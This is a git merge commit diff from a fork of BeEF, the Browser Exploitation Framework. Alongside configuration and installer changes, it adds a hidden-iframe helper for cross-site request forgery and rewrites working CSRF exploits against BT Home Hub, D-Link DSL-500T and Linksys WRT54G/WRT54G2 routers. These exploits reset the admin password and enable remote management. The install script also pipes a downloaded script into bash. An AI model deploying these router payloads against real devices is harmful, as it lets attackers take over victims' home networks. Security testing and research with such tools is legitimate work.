Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

Browse Source 
Resolved conflicts:
	core/main/client/net.js
	core/main/handlers/modules/beefjs.rb
This commit is contained in:
antisnatchor
2012-05-10 10:19:22 +01:00
parent 72ba526cbc 46a19ee0b9
commit 925e744194
18 changed files with 267 additions and 253 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
Rakefile
View File

@@ -152,3 +152,23 @@ task :dmg do
puts "\nBeEF.dmg created\n"
end
################################
# Create CDE Package
# This will download and make the CDE Executable and
# gnereate a CDE Package in cde-package
task :cde do
puts "\nCloning and Making CDE...";
sh "git clone git://github.com/pgbovine/CDE.git";
Dir.chdir "CDE";
sh "make";
Dir.chdir "..";
puts "\nCreating CDE Package...\n";
sh "./CDE/cde ruby beef";
sleep (1);
puts "\nCleaning Up...\n";
sh "rm -r CDE";
puts "\nCDE Package Created...\n";
end

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.4-alpha
0.4.3.5-alpha

3
config.yaml
View File

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.4-alpha'
version: '0.4.3.5-alpha'
debug: false
restrictions:
@@ -32,6 +32,7 @@ beef:
port: "3000"
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
hook_file: "/hook.js"

31
core/main/client/dom.js
View File

@@ -286,10 +286,37 @@ beef.dom = {
*/
detachApplet: function(id) {
$j('#' + id + '').detach();
},
/**
* Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
* @params: {String} action: the form action attribute, where the request will be sent.
* @params: {String} method: HTTP method, usually POST.
* @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
* example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
*/
createIframeXsrfForm: function(action, method, inputs){
var iframeXsrf = beef.dom.createInvisibleIframe();
var formXsrf = document.createElement('form');
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
var input = null;
for (i in inputs){
var attributes = inputs[i];
input = document.createElement('input');
for(key in attributes){
input.setAttribute(key, attributes[key]);
}
formXsrf.appendChild(input);
}
iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
formXsrf.submit();
return iframeXsrf;
}
};
beef.regCmp('beef.dom');

6
core/main/client/net.js
View File

@@ -136,7 +136,7 @@ beef.net = {
push:function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
}
},
@@ -158,8 +158,8 @@ beef.net = {
request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain) {
if (document.location.port == "" || document.location.port == null) {
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
if(document.location.port == "" || document.location.port == null){
cross_domain = !(port == "80" || port == "443");
}
}

4
core/main/configuration.rb
View File

@@ -118,7 +118,9 @@ module BeEF
# Load module configurations
def load_modules_config
self.set('beef.module', {})
Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
# support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
Dir.glob(module_configs) do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')

1
core/main/console/banners.rb
View File

@@ -92,6 +92,7 @@ module Banners
self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"

11
core/main/handlers/modules/beefjs.rb
View File

@@ -54,6 +54,17 @@ module Modules
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
end
end
end
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@body << eruby.evaluate(hook_session_config)

5
core/main/server.rb
View File

@@ -29,7 +29,8 @@ module BeEF
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
@url = "http://#{beef_host}:#{@configuration.get("beef.http.port")}"
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
@url = "http://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@command_urls = {}
@mounts = {}
@@ -44,6 +45,8 @@ module BeEF
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'),
'beef_hook' => @configuration.get('beef.http.hook_file')
}

6
extensions/demos/html/basic.html
View File

@@ -15,12 +15,12 @@
</p>
<p>
These links are for demonstrating the "collect links" command module<br />
These links are for demonstrating the "Get Page HREFs" command module<br />
<ul>
<li><a href="http://beefproject.com" target="_blank">BeEF homepage</a>
<li><a href="http://beefproject.com" target="_blank">The Browser Exploitation Framework Project homepage</a>
<li><a href="http://ha.ckers.org/" target="_blank">ha.ckers.org homepage</a>
<li><a href="http://slashdot.org/" target="_blank">Nerd homepage</a>
<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
</ul>
</p>

147
install-beef Normal file
View File

@@ -0,0 +1,147 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
clear
echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
echo "Detecting OS..";
OS=`uname`
if [ "${OS}" = "Linux" ] ; then
if [ -f /etc/redhat-release ] ; then
Distro='RedHat'
elif [ -f /etc/debian_version ] ; then
Distro='Debian'
fi
readonly OS
readonly Distro
fi
if [ "$OS" == "Darwin" ]; then
echo "Mac OSX Detected"
echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
source ~/.bash_login
rvm install 1.9.3-p0 --with-gcc=clang
rvm use 1.9.3-p0
echo ""
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
echo ""
echo "Installing Ruby Gems.."
bundle install
OK="yes"
cd beef
./beef
echo ""
echo "=========================================="
echo " Install Complete"
echo "Please restart Terminal and Run BeEF with:"
echo " $ ./beef "
echo "=========================================="
echo ""
fi
if [ "$Distro" == "Debian" ]; then
echo "Debian/Ubuntu Detected"
echo "Installing Prerequisite Packages.."
sudo apt-get update
sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
echo "Installing Ruby Gems"
sudo gem install bundler
sudo bundle install
cd beef
./beef
OK="yes"
echo ""
echo "=========================================="
echo " Install Complete"
echo "=========================================="
echo ""
fi
if [ "$Distro" == "RedHat" ]; then
echo "Redhat/Fedora Detected"
echo "Installing Prerequisite Packages.."
sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
echo ""
echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.2"
wget https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer
bash ./rvm-installer
source ~/.rvm/scripts/rvm
rvm pkg install openssl
rvm install 1.9.2 --with-openssl-dir=$rvm_path/usr
source ~/.rvm/scripts/rvm
rvm use 1.9.2 --default
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
gem install bundler
bundle
source ~/.bash_profile
cd beef
./beef
OK="yes"
echo ""
echo "=========================================="
echo " Install Complete"
echo "=========================================="
echo ""
fi
if [ "$OK" == "yes" ]; then
else
echo ""
echo "======================================="
echo " Install Failed"
echo "Unable to locate installer for your OS:"
echo $OS
echo $Distro
echo "======================================="
echo ""
fi

2
modules/debug/test_network_request/module.rb
View File

@@ -24,7 +24,7 @@ class Test_network_request < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.port")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [
{'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },

4
modules/hooked_domain/ajax_fingerprint/config.yaml
View File

@@ -17,8 +17,8 @@ beef:
module:
ajax_fingerprint:
enable: true
category: "Host"
name: "Hooked Domain"
category: "Hooked Domain"
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:

2
modules/phonegap/phonegap_persistence/module.rb
View File

@@ -22,7 +22,7 @@ class Phonegap_persistence < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.port")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [{
'name' => 'hook_url',

31
modules/router/bt_home_hub_csrf/command.js
View File

@@ -17,39 +17,16 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var bt_home_hub_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5");
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', '0');
input.setAttribute('value', '31');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', '1');
input.setAttribute('value', '');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', '30');
input.setAttribute('value', passwd);
form.appendChild(input);
bt_home_hub_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
[{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
delete form;
document.body.removeChild(bt_home_hub_iframe);
}
setTimeout("cleanup()", 15000);

49
modules/router/dlink_dsl500t_csrf/command.js
View File

@@ -17,48 +17,13 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var target = gateway + "/cgi-bin/webcm";
var dsl500t_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', target);
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'getpage');
input.setAttribute('value', '../html/tools/usrmgmt.htm');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/username');
input.setAttribute('value', 'admin');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/password');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/password_confirm');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/idle_timeout');
input.setAttribute('value', '30');
form.appendChild(input);
dsl500t_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
{'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
{'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

98
modules/router/linksys_wrt54g2_csrf/command.js
View File

@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var target = gateway + "Manage.tri";
var wrt54g2_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', target);
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_USE_HTTP');
input.setAttribute('value', 0);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_HTTP');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_HTTP_S');
input.setAttribute('value', 0);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_PASSWORDMOD');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_PASSWORD');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', '_http_enable');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_WLFILTER');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_REMOTE');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_PORT');
input.setAttribute('value', port);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'MANAGE_UPNP');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'layout');
input.setAttribute('value', 'en');
form.appendChild(input);
wrt54g2_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
{'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd},
{'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_PORT', 'value':port},
{'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

98
modules/router/linksys_wrt54g_csrf/command.js
View File

@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var target = gateway + "manage.tri";
var wrt54g_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', target);
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'remote_mgt_https');
input.setAttribute('value', 0);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'http_enable');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'https_enable');
input.setAttribute('value', 0);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'PasswdModify');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'http_passwd');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'http_passwdConfirm');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', '_http_enable');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'web_wl_filter');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'remote_management');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'http_wanport');
input.setAttribute('value', port);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'upnp_enable');
input.setAttribute('value', 1);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'layout');
input.setAttribute('value', 'en');
form.appendChild(input);
wrt54g_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");